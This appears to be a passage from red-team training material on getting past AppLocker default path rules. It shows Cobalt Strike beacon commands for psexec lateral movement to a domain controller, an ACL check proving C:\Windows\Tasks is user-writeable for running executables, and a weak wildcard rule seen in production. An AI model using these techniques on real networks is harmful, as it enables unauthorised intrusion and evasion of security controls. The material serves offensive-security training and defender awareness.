Writeable Paths

The default rules allow execution from anywhere within C:\Program Files and C:\Windows (including subdirectories). Moving laterally to a protected machine via psexec is trivial, because the service executable is written into C:\Windows.

beacon> jump psexec64 dc.dev-studio.com smb
Started service b8f5313 on dc.dev-studio.com
[+] established link to child beacon: 10.10.150.10

If you're on a protected machine as a standard user, there are several directories within C:\Windows that are writeable. One such example is C:\Windows\Tasks. This would allow us to copy an executable into this directory and run it.

beacon> powershell Get-Acl C:\Windows\Tasks | fl

Path   : Microsoft.PowerShell.Core\FileSystem::C:\Windows\Tasks
Owner  : NT AUTHORITY\SYSTEM
Group  : NT AUTHORITY\SYSTEM
Access : CREATOR OWNER Allow  268435456
         NT AUTHORITY\Authenticated Users Allow  CreateFiles, ReadAndExecute, Synchronize    <---
         NT AUTHORITY\SYSTEM Allow  268435456
         NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  268435456
         BUILTIN\Administrators Allow  FullControl
Audit  : 
Sddl   : O:SYG:SYD:PAI(A;OICIIO;GA;;;CO)(A;;0x1200ab;;;AU)(A;OICIIO;GA;;;SY)(A;;FA;;;SY)(A;OICIIO;GA;;;BA)(A;;FA;;;BA)

When enumerating the rules, you may also find additional weak rules that system administrators have put in. This is an example of a rule I've genuinely seen in production:

<FilePathCondition Path="*\AppV\*"/>

Last updated